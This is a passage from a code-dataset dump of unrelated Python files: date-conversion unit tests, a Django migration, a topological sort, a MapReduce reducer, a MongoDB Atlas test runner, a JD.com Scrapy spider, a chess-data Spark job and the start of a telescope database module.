UTC, 21:00\n response.s3.tzinfo = S3DefaultTZ(+11)\n result = convert(\"2011-10-01\")\n assertEqual(result, datetime.date(2011, 9, 30))\n\n # Reset to ISO format\n settings.L10n.date_format = \"%Y-%m-%d\"\n\n # Date+Time always convert to the exact UTC date\n # => 11 hours West of 22:00 is the same day\n result = convert(\"2011-10-01T22:00:00\")\n assertEqual(result, datetime.date(2011, 10, 1))\n # => 11 hours West of 09:00 is the previous day\n result = convert(\"2011-10-01T09:00:00\")\n assertEqual(result, datetime.date(2011, 9, 30))\n\n # Explicit timezone in string overrides default offset\n # => trailing Z means UTC\n result = convert(\"2011-10-01T09:00:00Z\")\n assertEqual(result, datetime.date(2011, 10, 1))\n\n # -------------------------------------------------------------------------\n def testDateTime(self):\n \"\"\" Test date/time conversion \"\"\"\n\n assertEqual = self.assertEqual\n settings = current.deployment_settings\n response = current.response\n\n convert = S3TypeConverter._datetime\n\n # Set custom format\n settings.L10n.date_format = \"%d.%m.%Y\"\n settings.L10n.time_format = \"%H.%M\"\n\n # Verify that ISO format always works\n result = convert(\"2011-10-01T16:37:00\")\n assertEqual(result, datetime.datetime(2011, 10, 1, 16, 37, 0))\n\n # Verify that local format always works\n result = convert(\"01.10.2011 16.37\")\n assertEqual(result, datetime.datetime(2011, 10, 1, 16, 37, 0))\n\n # Reset to ISO format\n settings.L10n.date_format = \"%Y-%m-%d\"\n settings.L10n.time_format = \"%H:%M:S\"\n\n # Verify without offset\n response.s3.tzinfo = S3DefaultTZ(0)\n result = convert(\"2011-10-01 07:30:00\")\n assertEqual(result, datetime.datetime(2011, 10, 1, 7, 30, 0))\n\n # Verify with offset\n response.s3.tzinfo = S3DefaultTZ(+11)\n result = convert(\"2011-10-01T22:00:00\")\n assertEqual(result, datetime.datetime(2011, 10, 1, 11, 0, 0))\n result = convert(\"2011-10-01T09:00:00\")\n assertEqual(result, datetime.datetime(2011, 9, 30, 22, 0, 0))\n # Explicit timezone in string overrides offset\n result = convert(\"2011-10-01T09:00:00Z\")\n assertEqual(result, datetime.datetime(2011, 10, 1, 9, 0, 0))\n\n# =============================================================================\nif __name__ == \"__main__\":\n\n run_suite(\n TypeConverterTests,\n )\n\n# END ========================================================================\n","sub_path":"modules/unit_tests/core/tools/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"5991939","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport jsonfield.fields\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='LM',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=20)),\n ('description', models.CharField(max_length=500)),\n ('date_added', models.DateTimeField(verbose_name=b'date published')),\n ('lmdata', jsonfield.fields.JSONField()),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"lm/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"503754411","text":"from graph import read_double_graph\r\n# import time\r\n\r\ndef read_topo_sort_from_file(filename):\r\n \"\"\"This reads the first line of the file. In a topological sort solution file,\r\n the first line holds the nodes in topological sort order on the first line,\r\n separated by whitespace.\"\"\"\r\n with open(filename) as f:\r\n string = f.readline()\r\n return string\r\n\r\n\r\ndef parse_tps(tps_str):\r\n \"\"\" Gets a string of ordering of nodes for topological\r\n ordering and creates a list of integers from that. \"\"\"\r\n return [int(x) for x in tps_str.split()]\r\n\r\n\r\ndef contains_sink_node(graph):\r\n \"\"\" Checks if there is a node without outgoing edge. \"\"\"\r\n # empty collections are boolean false, so this asks if all\r\n # nodes have a non-empty set of neighbors (outgoing edges)\r\n return all(graph[i] for i in graph)\r\n\r\n\r\ndef check_TPS(graph, tps):\r\n \"\"\" Takes a out-edge graph dictionary and a list of integers for\r\n topological ordering and checks if that topological ordering is correct. \"\"\"\r\n for i in reversed(range(len(tps))):\r\n for j in range(i):\r\n if tps[j] in graph[tps[i]]:\r\n print(\"Fault: There is a backward edge from \", tps[i], \" to \", tps[j])\r\n return False\r\n if len(graph.keys()) != len(tps):\r\n return False\r\n return True\r\n\r\n\r\ndef write_tps_to_file(tps, filename):\r\n with open('output_' + filename, 'w') as file:\r\n for node in tps:\r\n file.write(node + ' ')\r\n\r\n\r\ndef compute_tps(filename):\r\n \"\"\" Write your implementation to create a topological sort here. \r\n Store your answer in tps\"\"\"\r\n \"\"\" is the name of the input file containing graph information:\r\n you need to read it in and perform the topological sort, saving the results\r\n in tps, then use write_tps_to_file() to output it to a file called output_\"\"\"\r\n\r\n tps, colors = [], {}\r\n out_graph, in_graph = read_double_graph(filename)\r\n # start_time = time.process_time()\r\n colors = colors.fromkeys(out_graph, \"w\")\r\n for v in out_graph:\r\n if len(in_graph[v]) == 0:\r\n dfs_visit(v, colors, tps, out_graph)\r\n tps.reverse()\r\n # end_time = time.process_time()\r\n # print(\"Ran in: {:.5f} secs\".format(end_time - start_time))\r\n # if check_TPS(out_graph, tps):\r\n # print(\"CORRECT!\")\r\n write_tps_to_file(list(str(tps)), filename)\r\n\r\n\r\ndef dfs_visit(v, colors, tps, out_graph):\r\n colors[v] = \"g\"\r\n for e in out_graph[v]:\r\n if colors[e] == \"w\":\r\n dfs_visit(e, colors, tps, out_graph)\r\n colors[v] = \"b\"\r\n tps.append(v)\r\n\r\n\r\nif __name__ == '__main__':\r\n \"\"\" Write code here to run compute_tps for your testing purposes\"\"\"\r\n import sys\r\n filename = sys.argv[1]\r\n compute_tps(filename)\r\n","sub_path":"src.py","file_name":"src.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"2094729","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nPhilippe M. Noël\nMap Reduce - Reducer Subroutine -- Python 3\nBased on: http://www.michael-noll.com/tutorials/writing-an-hadoop-mapreduce-program-in-python/\nOriginal Code from Harvard APMTH120\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nimport sys\nfrom operator import itemgetter\n\ndef reducer():\n \"\"\" Reduce Subroutine of the Mapreduce Algorithm for Flight Delays \"\"\"\n # variables init\n curr_day, curr_sum_delays, curr_num_days = None, 0, 0\n\n # STDIN input reading\n for line in sys.stdin:\n # remove leading & trailing whitespaces, if any\n line = line.strip()\n # parse the input from the Map subroutine of Mapreduce (mapper.py)\n day, delay = line.split('\\t', 1)\n delay = int(delay) # type conversion\n # note: this IF-switch works because Hadoop sorts map output by key\n if curr_day == day:\n curr_sum_delays += delay\n curr_num_days += 1\n else:\n # case where day read != curr_day, so we output & reset\n print('Day = %s, Number of Delays = %s, Sum of Delays = %s ' +\n 'Average Delay = %s' % (curr_day, curr_num_days,\n curr_sum_delays, float(curr_sum_delays) / float(curr_num_days)))\n # reset counters\n curr_sum_delays, curr_num_days, curr_day = delay, 1, day\n\n # final day output\n if curr_day == day:\n print('Day = %s, Number of Delays = %s, Sum of Delays = %s ' +\n 'Average Delay = %s' % (curr_day, curr_num_days,\n curr_sum_delays, float(curr_sum_delays) / float(curr_num_days)))\n\n\n# driver test\nreducer()\n","sub_path":"mapreduce/airline_reducer.py","file_name":"airline_reducer.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"337136648","text":"# Copyright 2020-present MongoDB, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport os\nfrom time import sleep\nfrom urllib.parse import urlencode\n\nfrom tabulate import tabulate\nimport junitparser\nimport yaml\n\nfrom atlasclient import AtlasApiError, JSONObject\nfrom astrolabe.commands import (\n get_one_organization_by_name, ensure_project, ensure_admin_user,\n ensure_connect_from_anywhere)\nfrom astrolabe.exceptions import AstrolabeTestCaseError\nfrom astrolabe.poller import BooleanCallablePoller\nfrom astrolabe.utils import (\n assert_subset, get_cluster_name, get_test_name_from_spec_file,\n load_test_data, DriverWorkloadSubprocessRunner, SingleTestXUnitLogger,\n Timer)\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass AtlasTestCase:\n def __init__(self, *, client, test_name, cluster_name, specification,\n configuration):\n # Initialize.\n self.client = client\n self.id = test_name\n self.cluster_name = cluster_name\n self.spec = specification\n self.config = configuration\n self.failed = False\n\n # Initialize attribute used for memoization of connection string.\n self.__connection_string = None\n\n # Initialize wrapper class for running workload executor.\n self.workload_runner = DriverWorkloadSubprocessRunner()\n\n # Validate and store organization and project.\n self.organization = get_one_organization_by_name(\n client=self.client,\n organization_name=self.config.organization_name)\n self.project = ensure_project(\n client=self.client, project_name=self.config.project_name,\n organization_id=self.organization.id)\n\n @property\n def cluster_url(self):\n return self.client.groups[self.project.id].clusters[\n self.cluster_name]\n\n def get_connection_string(self):\n if self.__connection_string is None:\n cluster = self.cluster_url.get().data\n prefix, suffix = cluster.srvAddress.split(\"//\")\n uri_options = self.spec.maintenancePlan.uriOptions.copy()\n\n # Boolean options must be converted to lowercase strings.\n for key, value in uri_options.items():\n if isinstance(value, bool):\n uri_options[key] = str(value).lower()\n\n connection_string = (prefix + \"//\" + self.config.database_username\n + \":\" + self.config.database_password + \"@\"\n + suffix + \"/?\")\n connection_string += urlencode(uri_options)\n self.__connection_string = connection_string\n return self.__connection_string\n\n def __repr__(self):\n return \"\".format(self.id)\n\n def is_cluster_state(self, goal_state):\n cluster_info = self.cluster_url.get().data\n return cluster_info.stateName.lower() == goal_state.lower()\n\n def verify_cluster_configuration_matches(self, state):\n \"\"\"Verify that the cluster config is what we expect it to be (based on\n maintenance status). Raises AssertionError.\"\"\"\n state = state.lower()\n if state not in (\"initial\", \"final\"):\n raise AstrolabeTestCaseError(\n \"State must be either 'initial' or 'final'.\")\n cluster_config = self.cluster_url.get().data\n assert_subset(\n cluster_config,\n self.spec.maintenancePlan[state].clusterConfiguration)\n process_args = self.cluster_url.processArgs.get().data\n assert_subset(\n process_args, self.spec.maintenancePlan[state].processArgs)\n\n def initialize(self):\n \"\"\"\n Initialize a cluster with the configuration required by the test\n specification.\n \"\"\"\n LOGGER.info(\"Initializing cluster {!r}\".format(self.cluster_name))\n\n cluster_config = self.spec.maintenancePlan.initial.\\\n clusterConfiguration.copy()\n cluster_config[\"name\"] = self.cluster_name\n try:\n self.client.groups[self.project.id].clusters.post(\n **cluster_config)\n except AtlasApiError as exc:\n if exc.error_code == 'DUPLICATE_CLUSTER_NAME':\n # Cluster already exists. Simply re-configure it.\n # Cannot send cluster name when updating existing cluster.\n cluster_config.pop(\"name\")\n self.client.groups[self.project.id].\\\n clusters[self.cluster_name].patch(**cluster_config)\n\n # Apply processArgs if provided.\n process_args = self.spec.maintenancePlan.initial.processArgs\n if process_args:\n self.client.groups[self.project.id].\\\n clusters[self.cluster_name].processArgs.patch(**process_args)\n\n def run(self, persist_cluster=False, startup_time=1):\n LOGGER.info(\"Running test {!r} on cluster {!r}\".format(\n self.id, self.cluster_name))\n\n # Step-0: sanity-check the cluster configuration.\n self.verify_cluster_configuration_matches(\"initial\")\n\n # Start the test timer.\n timer = Timer()\n timer.start()\n\n # Step-1: load test data.\n test_data = self.spec.driverWorkload.get('testData')\n if test_data:\n LOGGER.info(\"Loading test data on cluster {!r}\".format(\n self.cluster_name))\n connection_string = self.get_connection_string()\n load_test_data(connection_string, self.spec.driverWorkload)\n LOGGER.info(\"Successfully loaded test data on cluster {!r}\".format(\n self.cluster_name))\n\n # Step-2: run driver workload.\n self.workload_runner.spawn(\n workload_executor=self.config.workload_executor,\n connection_string=self.get_connection_string(),\n driver_workload=self.spec.driverWorkload,\n startup_time=startup_time)\n\n # Step-3: begin maintenance routine.\n final_config = self.spec.maintenancePlan.final\n cluster_config = final_config.clusterConfiguration\n process_args = final_config.processArgs\n\n if not cluster_config and not process_args:\n raise RuntimeError(\"invalid maintenance plan\")\n\n if cluster_config:\n LOGGER.info(\"Pushing cluster configuration update\")\n self.cluster_url.patch(**cluster_config)\n\n if process_args:\n LOGGER.info(\"Pushing process arguments update\")\n self.cluster_url.processArgs.patch(**process_args)\n\n # Sleep before polling to give Atlas time to update cluster.stateName.\n sleep(3)\n\n # Step-4: wait until maintenance completes (cluster is IDLE).\n selector = BooleanCallablePoller(\n frequency=self.config.polling_frequency,\n timeout=self.config.polling_timeout)\n LOGGER.info(\"Waiting for cluster maintenance to complete\")\n selector.poll([self], attribute=\"is_cluster_state\", args=(\"IDLE\",),\n kwargs={})\n self.verify_cluster_configuration_matches(\"final\")\n LOGGER.info(\"Cluster maintenance complete\")\n\n # Step-5: interrupt driver workload and capture streams\n stats = self.workload_runner.terminate()\n\n # Stop the timer\n timer.stop()\n\n # Step-6: compute xunit entry.\n junit_test = junitparser.TestCase(self.id)\n junit_test.time = timer.elapsed\n\n if (stats['numErrors'] != 0 or stats['numFailures'] != 0 or\n stats['numSuccesses'] == 0):\n LOGGER.info(\"FAILED: {!r}\".format(self.id))\n self.failed = True\n # Write xunit logs for failed tests.\n junit_test.result = junitparser.Failure(str(stats))\n else:\n LOGGER.info(\"SUCCEEDED: {!r}\".format(self.id))\n # Directly log output of successful tests as xunit output\n # is only visible for failed tests.\n\n LOGGER.info(\"Workload Statistics: {}\".format(stats))\n\n # Step 7: download logs asynchronously and delete cluster.\n # TODO: https://github.com/mongodb-labs/drivers-atlas-testing/issues/4\n if not persist_cluster:\n self.cluster_url.delete()\n LOGGER.info(\"Cluster {!r} marked for deletion.\".format(\n self.cluster_name))\n\n return junit_test\n\n\nclass SpecTestRunnerBase:\n \"\"\"Base class for spec test runners.\"\"\"\n def __init__(self, *, client, test_locator_token, configuration, xunit_output,\n persist_clusters, workload_startup_time):\n self.cases = []\n self.client = client\n self.config = configuration\n self.xunit_logger = SingleTestXUnitLogger(output_directory=xunit_output)\n self.persist_clusters = persist_clusters\n self.workload_startup_time = workload_startup_time\n\n for full_path in self.find_spec_tests(test_locator_token):\n # Step-1: load test specification.\n with open(full_path, 'r') as spec_file:\n test_spec = JSONObject.from_dict(\n yaml.load(spec_file, Loader=yaml.FullLoader))\n\n # Step-2: generate test name.\n test_name = get_test_name_from_spec_file(full_path)\n\n # Step-3: generate unique cluster name.\n cluster_name = get_cluster_name(test_name, self.config.name_salt)\n\n self.cases.append(\n AtlasTestCase(client=self.client,\n test_name=test_name,\n cluster_name=cluster_name,\n specification=test_spec,\n configuration=self.config))\n\n # Set up Atlas for tests.\n # Step-1: ensure validity of the organization.\n # Note: organizations can only be created by via the web UI.\n org_name = self.config.organization_name\n LOGGER.info(\"Verifying organization {!r}\".format(org_name))\n org = get_one_organization_by_name(\n client=self.client, organization_name=org_name)\n LOGGER.info(\"Successfully verified organization {!r}\".format(org_name))\n\n # Step-2: check that the project exists or else create it.\n pro_name = self.config.project_name\n LOGGER.info(\"Verifying project {!r}\".format(pro_name))\n project = ensure_project(\n client=self.client, project_name=pro_name, organization_id=org.id)\n LOGGER.info(\"Successfully verified project {!r}\".format(pro_name))\n\n # Step-3: create a user under the project.\n # Note: all test operations will be run as this user.\n uname = self.config.database_username\n LOGGER.info(\"Verifying user {!r}\".format(uname))\n ensure_admin_user(\n client=self.client, project_id=project.id,\n username=uname, password=self.config.database_password)\n LOGGER.info(\"Successfully verified user {!r}\".format(uname))\n\n # Step-4: populate project IP whitelist to allow access from anywhere.\n LOGGER.info(\"Enabling access from anywhere on project \"\n \"{!r}\".format(pro_name))\n ensure_connect_from_anywhere(client=self.client, project_id=project.id)\n LOGGER.info(\"Successfully enabled access from anywhere on project \"\n \"{!r}\".format(pro_name))\n\n # Step-5: log test plan.\n LOGGER.info(self.get_printable_test_plan())\n\n @staticmethod\n def find_spec_tests(test_locator_token):\n raise NotImplementedError\n\n def get_printable_test_plan(self):\n table_data = []\n for test_case in self.cases:\n table_data.append([test_case.id, test_case.cluster_name])\n table_txt = \"Astrolabe Test Plan\\n{}\\n\"\n return table_txt.format(tabulate(\n table_data, headers=[\"Test name\", \"Atlas cluster name\"],\n tablefmt=\"rst\"))\n\n def run(self):\n # Step-0: sentinel flag to track failure/success.\n failed = False\n\n # Step-1: initialize tests clusters\n for case in self.cases:\n case.initialize()\n\n # Step-2: run tests round-robin until all have been run.\n remaining_test_cases = self.cases.copy()\n while remaining_test_cases:\n selector = BooleanCallablePoller(\n frequency=self.config.polling_frequency,\n timeout=self.config.polling_timeout)\n\n # Select a case whose cluster is ready.\n LOGGER.info(\"Waiting for a test cluster to become ready\")\n active_case = selector.poll(\n remaining_test_cases, attribute=\"is_cluster_state\",\n args=(\"IDLE\",), kwargs={})\n LOGGER.info(\"Test cluster {!r} is ready\".format(\n active_case.cluster_name))\n\n # Run the case.\n xunit_test = active_case.run(persist_cluster=self.persist_clusters,\n startup_time=self.workload_startup_time)\n # Write xunit entry for case.\n self.xunit_logger.write_xml(\n test_case=xunit_test,\n filename=active_case.id)\n # Remove completed case from list.\n remaining_test_cases.remove(active_case)\n # Update tracker.\n failed = failed or active_case.failed\n\n return failed\n\n\nclass SingleTestRunner(SpecTestRunnerBase):\n \"\"\"Run the spec test file named ``test_locator_token``.\"\"\"\n @staticmethod\n def find_spec_tests(test_locator_token):\n \"\"\"\n Verify that the given file is a spec test file and return its\n absolute path.\n \"\"\"\n LOGGER.info(\"Loading spec test from file {!r}\".format(\n test_locator_token))\n full_path = os.path.realpath(test_locator_token)\n if (os.path.isfile(full_path) and\n test_locator_token.lower().endswith(('.yml', 'yaml'))):\n yield full_path\n\n\nclass MultiTestRunner(SpecTestRunnerBase):\n \"\"\"Run all spec test files in the ``test_locator_token`` directory.\"\"\"\n @staticmethod\n def find_spec_tests(test_locator_token):\n LOGGER.info(\"Scanning directory {!r} for spec tests\".format(\n test_locator_token))\n for root, dirs, files in os.walk(test_locator_token):\n for file in files:\n full_path = os.path.join(root, file)\n if (os.path.isfile(full_path) and\n file.lower().endswith(('.yml', 'yaml'))):\n LOGGER.debug(\"Loading spec test from file {!r}\".format(\n full_path))\n yield full_path\n","sub_path":"astrolabe/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":15066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"572041036","text":"import scrapy\nfrom jd.items import JdItem\n\nimport json\n\n\nclass JD(scrapy.Spider):\n name = 'jd'\n allowed_domains = ['jd.com']\n start_urls = [\n 'https://search.jd.com/Search?keyword=%E8%BF%9B%E5%8F%A3%E7%89%9B%E5%A5%B6&enc=utf-8&wq=%E8%BF%9B%E5%8F%A3%E7%89%9B%E5%A5%B6&pvid=16abdf7af7b04a2c837a08aaa8705e60'\n ]\n\n def parse(self, response):\n goods = response.xpath('//li[@class=\"gl-item\"]')\n for good in goods:\n item1 = JdItem()\n gid = good.xpath('./@data-sku').extract_first()\n link = f'https://item.jd.com/{gid}.html'\n item1['good_ID'] = gid\n item1['title'] = good.xpath('string(.//div[@class=\"p-name p-name-type-2\"]//em)').extract_first()\n item1['link'] = link\n item1['price'] = good.xpath('.//div[@class=\"p-price\"]//i//text()').extract_first()\n yield scrapy.Request(url=link, meta={'item': item1}, callback=self.parse_detail)\n\n def parse_detail(self, response):\n item1 = response.meta['item']\n item1['shop_name'] = response.xpath(\n '//div[@class=\"J-hove-wrap EDropdown fr\"]//div[@class=\"name\"]//a//text()').extract_first()\n gid = item1['good_ID']\n comment_url = f'https://sclub.jd.com/comment/productPageComments.action?productId={gid}&score=0&sortType=5&page=0&pageSize=10'\n yield scrapy.Request(url=comment_url, meta={'item': item1}, callback=self.parse_get_comment)\n\n def parse_get_comment(self, response):\n item1 = response.meta['item']\n data = json.loads(response.text).get('productCommentSummary')\n item1['commentCountStr'] = data['commentCountStr']\n item1['goodCountStr'] = data['goodCountStr']\n item1['generalCountStr'] = data['generalCountStr']\n item1['poorCountStr'] = data['poorCountStr']\n item1['max_page'] = json.loads(response.text).get('maxPage')\n return item1\n","sub_path":"jd/jd/spiders/jd_spider.py","file_name":"jd_spider.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"249267477","text":"import sys\nfrom pyspark import SparkContext, AccumulatorParam\nfrom pyspark.sql import SQLContext\nimport io\nimport math\nimport datetime\nimport numpy as np\nimport chess.pgn\nimport random\n\n\ndef round_elo(elo):\n\treturn math.floor(elo / 100.0) * 100\n\n\ndef get_elo_from_str(elo):\n\ttry:\n\t\treturn round_elo(int(elo))\n\texcept Exception:\n\t\treturn -1 # -1 will represent an unknown elo\n\n\ndef get_time_allocated(time_control):\n\tsplit_time_control = time_control.split('+')\n\tif len(split_time_control) > 1:\n\t\treturn int(split_time_control[0])\n\telse:\n\t\treturn -1 # -1 will represent a missing time allocation\n\n\ndef get_one_hot_encoding_of_board(board):\n\tencoding_template = [0 for i in range(12)]\n\n\tposition = []\n\tfor square in chess.SQUARES:\n\t\tpiece = board.piece_at(square)\n\n\t\tencoding = encoding_template.copy()\n\t\tif piece is not None:\n\t\t\tpiece_type = piece.piece_type\n\t\t\t# add six if its a black piece\n\t\t\tif not piece.color:\n\t\t\t\tpiece_type += 6\n\n\t\t\tencoding[piece_type - 1] = 1\n\n\t\tposition.append(encoding)\n\n\treturn position\n\n\n# gets the clock time\ndef get_clock_time_in_seconds(comment):\n\tpass\n\tsp = comment.split('clk')\n\tif len(sp) > 1:\n\t\tt = sp[1].strip().strip(']')\n\t\thours, minutes, seconds = t.split(':')\n\t\treturn datetime.timedelta(hours=int(hours), minutes=int(minutes), seconds=int(seconds)).total_seconds()\n\telse:\n\t\treturn -1 # -1 will represent an unknown clock time\n\n\nWHITE_ELO = 'WhiteElo'\nBLACK_ELO = 'BlackElo'\nTIME_CONTROL = 'TimeControl'\nTERMINATION = 'Termination'\nVARIANT = 'Variant'\nEVAL = 'eval'\n\nMIN_ELO = 1200\nMAX_ELO = 2200\n\nBALANCE = True\n\ndef normalize_elo(elo):\n\treturn ((elo - MIN_ELO) * 1.0) / (MAX_ELO - MIN_ELO)\n\n# range of elos we will include in the dataset\nVALID_ELOS = set(range(MIN_ELO, MAX_ELO + 100, 100))\n\n# lowest time format we will consider\nTIME_FORMAT_CUTOFF = 600\n\n# all moves played with less than this amount of time will not be considered\nCLOCK_CUTOFF = 120\n\n\nif __name__ == '__main__':\n\tinput_dir = sys.argv[1]\n\toutput_dir = sys.argv[2]\n\n\tsc = SparkContext(appName=\"PgnCount\")\n\tsc._jsc.hadoopConfiguration().set(\"textinputformat.record.delimiter\", \"\\n\\n[Event\")\n\n\tsqlContext = SQLContext(sc)\n\n\t# we need to use \\n\\n[Event as our delimiter because of PGN's specific format\n\t# then we need to fix the records so that an individual game is a single record\n\t# that a mapper processes\n\tdef fix_record(record):\n\t\tif record.startswith('[Event'):\n\t\t\treturn record + '\\n'\n\t\telse:\n\t\t\treturn ''.join(['[Event', record, '\\n'])\n\n\tdef contains_headers(game):\n\t\treturn (WHITE_ELO in game.headers\n\t\t\tand BLACK_ELO in game.headers\n\t\t\tand TIME_CONTROL in game.headers)\n\n\trecords_analyzed = 0\n\tbatch_size = 10\n\n\t# function used to label all the positions in the game\n\tdef label_game(record):\n\t\tpgn = io.StringIO(record)\n\t\tgame = chess.pgn.read_game(pgn)\n\n\t\tif not contains_headers(game):\n\t\t\treturn []\n\n\t\tif not len(game.variations) > 0:\n\t\t\treturn []\n\n\t\tcomment = game.variations[0].comment\n\n\t\t# game has engine evaluation\n\t\tif not '%eval' in comment:\n\t\t\treturn []\n\n\t\twhite_elo = get_elo_from_str(game.headers[WHITE_ELO])\n\t\tblack_elo = get_elo_from_str(game.headers[BLACK_ELO])\n\n\t\t# if both players are not in the elo range skip the game\n\t\tif not white_elo in VALID_ELOS and not black_elo in VALID_ELOS:\n\t\t\treturn []\n\n\t\ttime_allocated = get_time_allocated(game.headers[TIME_CONTROL])\n\n\t\t# if the time control doesnt meet the cutoff skip the game\n\t\tif time_allocated < TIME_FORMAT_CUTOFF:\n\t\t\treturn []\n\n\t\tblunders = []\n\t\tnon_blunders = []\n\n\t\t# loop through the mainline of the game\n\t\tboard = game.board()\n\n\t\tfor node in game.mainline():\n\t\t\t# get previous positions turn\n\t\t\tturn = board.turn\n\n\t\t\t# get the previous turns elo\n\t\t\telo = white_elo if turn else black_elo\n\n\t\t\tif elo in VALID_ELOS:\n\n\t\t\t\tclock_time = get_clock_time_in_seconds(node.comment)\n\t\t\t\t# was there enough time on the clock?\n\t\t\t\tif clock_time >= CLOCK_CUTOFF:\n\n\t\t\t\t\t# get the position as a one hot encoding\n\t\t\t\t\tposition = get_one_hot_encoding_of_board(board)\n\t\t\t\t\tposition = bytearray(np.array(position).tobytes())\n\t\n\t\t\t\t\tif chess.pgn.NAG_BLUNDER in node.nags:\n\t\t\t\t\t\tblunders.append((position, int(turn), normalize_elo(elo), 1))\n\t\t\t\t\telse:\n\t\t\t\t\t\tnon_blunders.append((position, int(turn), normalize_elo(elo), 0))\n\n\t\t\tboard.push(node.move)\n\n\t\tif BALANCE and len(non_blunders) > len(blunders):\n\t\t\tnum_blunders = len(blunders)\n\t\t\tincluded_non_blunders = random.sample(non_blunders, num_blunders)\n\n\t\t\tdataset = blunders + included_non_blunders\n\t\telse:\n\t\t\tdataset = blunders + non_blunders\n\n\t\tglobal records_analyzed\n\t\tglobal batch_size\n\t\trecords_analyzed += 1\n\t\tif records_analyzed % batch_size == 0:\n\t\t\tprint('Number of records processed: {}'.format(records_analyzed))\n\n\t\treturn dataset\n\n\ttext_file = sc.textFile(input_dir)\n\tres = text_file.map(fix_record).flatMap(label_game)\n\n\tdf = sqlContext.createDataFrame(res, ['position', 'turn', 'elo', 'label'])\n\tdf.write.format(\"tfrecords\").option(\"codec\", \"org.apache.hadoop.io.compress.GzipCodec\").mode(\"overwrite\").save(output_dir)\n","sub_path":"spark-jobs/data-preparation-job/data_preparation_job.py","file_name":"data_preparation_job.py","file_ext":"py","file_size_in_byte":4959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"272663549","text":"\"\"\"NECSTDB, a database for NECST.\nNECST, an abbreviation of *NEw Control System for Telescope*, is a flexible controlling\nsystem for radio telescopes. Its efficient data storage format is provided here.\nThe database contains tables, which keep individual topic of data with some metadata\nattached to them, e.g. spectral data from one spectrometer board (array of data +\ntimestamp), various kinds of weather data (temperature + humidity + wind speed + wind\ndirection + ... + timestamp), etc.\n\"\"\"\n\nimport json\nimport mmap\nimport os\nimport pathlib\nimport re\nimport struct\nimport tarfile\nfrom typing import Any, Dict, List, Tuple, Union\n\nimport numpy\nimport pandas\n\nfrom . import utils\nfrom .recover import recover\n\n\ndef duplicate_rename(path: pathlib.Path, _i: int = 0) -> pathlib.Path:\n \"\"\"Return nonexistent path for new file.\n\n Parameters\n ----------\n path\n File path you want to create as *new* file.\n\n \"\"\"\n _path = path if _i == 0 else path.parent / f\"{path.stem}({_i}){path.suffix}\"\n if not _path.exists():\n return _path\n return duplicate_rename(path, _i + 1)\n\n\nclass necstdb:\n \"\"\"Database for NECST.\n\n Parameters\n ----------\n path: PathLike\n Path to the database directory, the direct parent of *.data and *.header files.\n mode: str\n Mode in which the database is opened, either \"r\" or \"w\".\n\n \"\"\"\n\n def __init__(self, path: os.PathLike, mode: str) -> None:\n self.opendb(path, mode)\n\n def opendb(self, path: os.PathLike, mode: str) -> None:\n \"\"\"Catch the database directory.\"\"\"\n self.path = pathlib.Path(path)\n\n if not self.path.exists():\n if mode.find(\"w\") != -1:\n self.path.mkdir(parents=True)\n elif mode.find(\"r\") != -1:\n raise Exception(\"This directory doesn't exist!!\")\n\n def list_tables(self) -> List[str]:\n \"\"\"List all tables within the database.\"\"\"\n data = [path.stem for path in self.path.glob(\"*.data\")]\n header = [path.stem for path in self.path.glob(\"*.header\")]\n return sorted(set(data) & set(header))\n\n def create_table(\n self, name: str, config: Dict[str, Any], endian: str = \"<\"\n ) -> None:\n \"\"\"Create a pair of data and header files, then write header content.\"\"\"\n if name in self.list_tables():\n return\n self.endian = endian\n\n format_list = [dat[\"format\"] for dat in config[\"data\"]]\n\n # Validate sizes\n struct_sizes = utils.get_struct_sizes(format_list, endian)\n for dat, size in zip(config[\"data\"], struct_sizes):\n dat[\"size\"] = size\n config[\"struct_indices\"] = True\n\n data_path = self.path / (name + \".data\")\n header_path = self.path / (name + \".header\")\n\n data_path.touch()\n with header_path.open(\"w\") as f:\n json.dump(config, 